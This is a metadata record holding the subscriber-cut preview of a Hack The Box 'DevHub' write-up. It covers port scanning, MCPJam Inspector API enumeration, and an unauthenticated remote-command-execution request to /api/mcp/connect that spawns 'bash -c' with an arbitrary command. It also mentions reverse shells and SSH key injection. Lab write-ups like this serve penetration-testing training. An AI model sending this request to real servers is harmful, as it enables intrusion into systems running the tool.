Raw Record Source

{
  "$type": "site.standard.document",
  "bskyPostRef": {
    "cid": "bafyreifpjlwewbqnzt7muizacmx3w4ia632hfmdowyeimnunq2lkitsmhy",
    "uri": "at://did:plc:gc2nrf5j5b2po5huoyw6utr4/app.bsky.feed.post/3mni5tqqwy5q2"
  },
  "coverImage": {
    "$type": "blob",
    "ref": {
      "$link": "bafkreie7bjymilfktcans4xygbcyt5vun2qc2qopzrkoeehicvoasvnzli"
    },
    "mimeType": "image/jpeg",
    "size": 48077
  },
  "description": "HTB MACHINE: DEVHUB IP:  Attacker IP:  OS: Ubuntu 22.04.5 LTS Difficulty: Medium Category: Web / MCP Ecosystem / Lateral Movement RECONNAISSANCE PORT SCAN nmap -Pn -T4 -sV -p- --min-rate 2000  PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.15 80/tcp open http nginx 1.18.0 (Ubuntu) 6274/tcp open http MCPJam Inspector (Node.js) Internal-only ports discovered later via process enumeration: 5000/t...",
  "path": "/hack-the-box-htb-devhub-writeup-medium-weekly-may-31th-2026/",
  "publishedAt": "2026-05-31T04:00:00.000Z",
  "site": "https://1337sheets.com",
  "tags": [
    "Subscribe now"
  ],
  "textContent": "# HTB Machine: DevHub\n\n**IP:** <TARGET_IP>\n**Attacker IP:** <ATTACKER_IP>\n**OS:** Ubuntu 22.04.5 LTS\n**Difficulty:** Medium\n**Category:** Web / MCP Ecosystem / Lateral Movement\n\n* * *\n\n## Reconnaissance\n\n### Port Scan\n\n\n    nmap -Pn -T4 -sV -p- --min-rate 2000 <TARGET_IP>\n\n\n\n    PORT     STATE  SERVICE  VERSION\n    22/tcp   open   ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.15\n    80/tcp   open   http     nginx 1.18.0 (Ubuntu)\n    6274/tcp open   http     MCPJam Inspector (Node.js)\n\n\nInternal-only ports discovered later via process enumeration:\n\n\n    5000/tcp  OPSMCP Flask server  (127.0.0.1 only)\n    8888/tcp  JupyterLab           (127.0.0.1 only)\n\n\n### Web Enumeration — Port 80\n\nAdding `devhub.htb` to `/etc/hosts` and visiting port 80 reveals a static nginx landing page for **DevHub — Internal Development & Analytics Platform**. Three service cards are listed:\n\nService | Status | Notes\n---|---|---\nMCP Inspector | Active — Port 6274 | MCPJam Inspector\nAnalytics Dashboard | Internal Only — localhost:8888 | JupyterLab, runs as `analyst`\nCode Repository | Maintenance Mode | Internal Git\n\nThe Jupyter card explicitly states access is restricted to the analyst team — an early signal that `analyst` is a meaningful user.\n\n### MCPJam Inspector — Port 6274\n\nBrowsing to `http://devhub.htb:6274/` loads the MCPJam Inspector UI. MCPJam is an open-source developer tool for connecting to, testing, and debugging MCP servers.\n\nAPI surface enumeration:\n\n\n    curl -s http://<TARGET_IP>:6274/api/mcp/servers\n    # {\"success\":true,\"servers\":[]}\n\n    curl -s -X POST http://<TARGET_IP>:6274/api/mcp/connect \\\n      -H 'Content-Type: application/json' -d '{}'\n    # {\"success\":false,\"error\":\"...\"}\n\n\nThe `/api/mcp/connect` endpoint accepts a `serverConfig` JSON body. This is the attack surface.\n\n* * *\n\n## Initial Access — MCPJam Inspector RCE (CVE-2026-23744)\n\n### Vulnerability Analysis\n\nThe `POST /api/mcp/connect` endpoint allows a client to specify an MCP server to connect to. When the transport type is `stdio`, MCPJam spawns the given `command` with `args` as a subprocess and communicates with it over stdin/stdout using the MCP JSON-RPC protocol.\n\nThere is no authentication on this endpoint and no validation of the `command` field. Any OS binary can be specified and will be executed as the user running the MCPJam process (`mcp-dev`).\n\n**Exploitation request:**\n\n\n    POST /api/mcp/connect HTTP/1.1\n    Host: devhub.htb:6274\n    Content-Type: application/json\n    Origin: http://localhost:6274\n\n    {\n      \"serverId\": \"pwn\",\n      \"serverConfig\": {\n        \"type\": \"stdio\",\n        \"command\": \"bash\",\n        \"args\": [\"-c\", \"<OS COMMAND>\"],\n        \"env\": {\"PATH\": \"/usr/bin:/bin\"}\n      }\n    }\n\n\nThe response will always report `\"Connection closed\"` because bash exits after running the command (it never speaks the MCP protocol), but the command executes before bash terminates.\n\n**Outbound firewall note:** The target host firewall permits outbound HTTP (port 80) but blocks raw TCP reverse shells (`/dev/tcp`). This rules out traditional reverse shells. SSH key injection is used instead, which requires no outbound connection from the target.\n\n### This post is for subscribers only\n\nBecome a member to get access to all content\n\nSubscribe now",
  "title": "Hack The Box - HTB DevHub Writeup - Medium - Weekly - May 31th, 2026",
  "updatedAt": "2026-06-04T17:34:01.893Z"
}